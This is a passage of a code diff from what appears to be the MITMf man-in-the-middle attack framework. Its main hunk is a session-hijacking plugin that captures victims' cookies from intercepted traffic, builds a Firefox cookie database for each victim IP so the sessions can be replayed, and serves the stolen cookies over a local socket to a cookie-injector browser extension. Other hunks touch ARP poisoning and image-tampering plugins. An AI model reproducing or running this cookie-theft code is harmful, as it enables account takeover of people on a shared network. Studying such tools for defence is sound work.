#SQLite version 3.7.0 or later. You won't be able to read the database files
|
||||||
|
#with SQLite version 3.6.23.1 or earlier. You'll get the "file is encrypted
|
||||||
|
#or is not a database" message.
|
||||||
|
|
||||||
|
sqlv = sqlite3.sqlite_version.split('.')
|
||||||
|
if (sqlv[0] <3 or sqlv[1] < 7):
|
||||||
|
sys.exit("[-] sqlite3 version 3.7 or greater required")
|
||||||
|
|
||||||
|
if not os.path.exists("./logs"):
|
||||||
|
os.makedirs("./logs")
|
||||||
|
|
||||||
|
if self.mallory:
|
||||||
|
t = threading.Thread(name='mallory_server', target=self.mallory_server, args=())
|
||||||
|
t.setDaemon(True)
|
||||||
|
t.start()
|
||||||
|
|
||||||
|
def cleanHeaders(self, request): # Client => Server
|
||||||
|
headers = request.getAllHeaders().copy()
|
||||||
|
client_ip = request.getClientIP()
|
||||||
|
|
||||||
|
if 'cookie' in headers:
|
||||||
|
|
||||||
|
if self.firefox:
|
||||||
|
url = "http://" + headers['host'] + request.getPathFromUri()
|
||||||
|
for cookie in headers['cookie'].split(';'):
|
||||||
|
eq = cookie.find("=")
|
||||||
|
cname = str(cookie)[0:eq].strip()
|
||||||
|
cvalue = str(cookie)[eq+1:].strip()
|
||||||
|
self.firefoxdb(headers['host'], cname, cvalue, url, client_ip)
|
||||||
|
|
||||||
|
mitmf_logger.info("%s << Inserted cookie into firefox db" % client_ip)
|
||||||
|
|
||||||
|
if self.mallory:
|
||||||
|
if len(self.sessions) > 0:
|
||||||
|
temp = []
|
||||||
|
for session in self.sessions:
|
||||||
|
temp.append(session[0])
|
||||||
|
if headers['host'] not in temp:
|
||||||
|
self.sessions.append((headers['host'], headers['cookie']))
|
||||||
|
mitmf_logger.info("%s Got client cookie: [%s] %s" % (client_ip, headers['host'], headers['cookie']))
|
||||||
|
mitmf_logger.info("%s Sent cookie to browser extension" % client_ip)
|
||||||
|
else:
|
||||||
|
self.sessions.append((headers['host'], headers['cookie']))
|
||||||
|
mitmf_logger.info("%s Got client cookie: [%s] %s" % (client_ip, headers['host'], headers['cookie']))
|
||||||
|
mitmf_logger.info("%s Sent cookie to browser extension" % client_ip)
|
||||||
|
|
||||||
|
#def handleHeader(self, request, key, value): # Server => Client
|
||||||
|
# if 'set-cookie' in request.client.headers:
|
||||||
|
# cookie = request.client.headers['set-cookie']
|
||||||
|
# #host = request.client.headers['host'] #wtf????
|
||||||
|
# message = "%s Got server cookie: %s" % (request.client.getClientIP(), cookie)
|
||||||
|
# if self.urlMonitor.isClientLogging() is True:
|
||||||
|
# self.urlMonitor.writeClientLog(request.client, request.client.headers, message)
|
||||||
|
# else:
|
||||||
|
# mitmf_logger.info(message)
|
||||||
|
|
||||||
|
def mallory_server(self):
|
||||||
|
host = ''
|
||||||
|
port = 20666
|
||||||
|
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||||
|
server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
|
||||||
|
server.bind((host,port))
|
||||||
|
server.listen(1)
|
||||||
|
while True:
|
||||||
|
client, addr = server.accept()
|
||||||
|
if addr[0] != "127.0.0.1":
|
||||||
|
client.send("Hacked By China!")
|
||||||
|
client.close()
|
||||||
|
continue
|
||||||
|
request = client.recv(8192)
|
||||||
|
request = request.split('\n')
|
||||||
|
path = request[0].split()[1]
|
||||||
|
client.send("HTTP/1.0 200 OK\r\n")
|
||||||
|
client.send("Content-Type: text/html\r\n\r\n")
|
||||||
|
if path == "/":
|
||||||
|
client.send(json.dumps(self.sessions))
|
||||||
|
client.close()
|
||||||
|
|
||||||
|
def firefoxdb(self, host, cookie_name, cookie_value, url, ip):
|
||||||
|
|
||||||
|
session_dir=self.save_dir + "/" + ip
|
||||||
|
cookie_file=session_dir +'/cookies.sqlite'
|
||||||
|
cookie_file_exists = os.path.exists(cookie_file)
|
||||||
|
|
||||||
|
if (ip not in (self.sql_conns and os.listdir("./logs"))):
|
||||||
|
|
||||||
|
try:
|
||||||
|
if not os.path.exists(session_dir):
|
||||||
|
os.makedirs(session_dir)
|
||||||
|
|
||||||
|
db = sqlite3.connect(cookie_file, isolation_level=None)
|
||||||
|
self.sql_conns[ip] = db.cursor()
|
||||||
|
|
||||||
|
if not cookie_file_exists:
|
||||||
|
self.sql_conns[ip].execute("CREATE TABLE moz_cookies (id INTEGER PRIMARY KEY, baseDomain TEXT, name TEXT, value TEXT, host TEXT, path TEXT, expiry INTEGER, lastAccessed INTEGER, creationTime INTEGER, isSecure INTEGER, isHttpOnly INTEGER, CONSTRAINT moz_uniqueid UNIQUE (name, host, path))")
|
||||||
|
self.sql_conns[ip].execute("CREATE INDEX moz_basedomain ON moz_cookies (baseDomain)")
|
||||||
|
except Exception, e:
|
||||||
|
print str(e)
|
||||||
|
|
||||||
|
scheme = urlparse(url).scheme
|
||||||
|
scheme = (urlparse(url).scheme)
|
||||||
|
basedomain = self.psl.get_public_suffix(host)
|
||||||
|
address = urlparse(url).hostname
|
||||||
|
short_url = scheme + "://"+ address
|
||||||
|
|
||||||
|
log = open(session_dir + '/visited.html','a')
|
||||||
|
if (ip not in self.seen_hosts):
|
||||||
|
self.seen_hosts[ip] = {}
|
||||||
|
log.write(self.html_header)
|
||||||
|
|
||||||
|
if (address not in self.seen_hosts[ip]):
|
||||||
|
self.seen_hosts[ip][address] = 1
|
||||||
|
log.write("\n<br>\n<a href='%s'>%s</a>" %(short_url, address))
|
||||||
|
|
||||||
|
log.close()
|
||||||
|
|
||||||
|
if address == basedomain:
|
||||||
|
address = "." + address
|
||||||
|
|
||||||
|
expire_date = 2000000000 #Year2033
|
||||||
|
now = int(time.time()) - 600
|
||||||
|
self.sql_conns[ip].execute('INSERT OR IGNORE INTO moz_cookies (baseDomain, name, value, host, path, expiry, lastAccessed, creationTime, isSecure, isHttpOnly) VALUES (?,?,?,?,?,?,?,?,?,?)', (basedomain,cookie_name,cookie_value,address,'/',expire_date,now,now,0,0))
|
||||||
|
|
||||||
|
def add_options(self, options):
|
||||||
|
options.add_argument('--firefox', dest='firefox', action='store_true', default=False, help='Create a firefox profile with captured cookies')
|
||||||
|
options.add_argument('--mallory', dest='mallory', action='store_true', default=False, help='Send cookies to the Mallory cookie injector browser extension')
|
||||||
|
|
||||||
|
def finish(self):
|
||||||
|
if self.firefox:
|
||||||
|
print "\n[*] To load a session run: 'firefox -profile <client-ip> logs/<client-ip>/visited.html'"
|
|
@ -18,8 +18,6 @@
|
||||||
# USA
|
# USA
|
||||||
#
|
#
|
||||||
|
|
||||||
import logging
|
|
||||||
|
|
||||||
from sys import exit
|
from sys import exit
|
||||||
from core.utils import SystemConfig, IpTables
|
from core.utils import SystemConfig, IpTables
|
||||||
from core.protocols.arp.ARPpoisoner import ARPpoisoner
|
from core.protocols.arp.ARPpoisoner import ARPpoisoner
|
||||||
|
|
|
@ -23,6 +23,8 @@ from cStringIO import StringIO
|
||||||
from plugins.plugin import Plugin
|
from plugins.plugin import Plugin
|
||||||
from PIL import Image
|
from PIL import Image
|
||||||
|
|
||||||
|
mitmf_logger = logging.getLogger("mitmf")
|
||||||
|
|
||||||
class Upsidedownternet(Plugin):
|
class Upsidedownternet(Plugin):
|
||||||
name = "Upsidedownternet"
|
name = "Upsidedownternet"
|
||||||
optname = "upsidedownternet"
|
optname = "upsidedownternet"
|
||||||
|
|
Loading…
Add table
Add a link
Reference in a new issue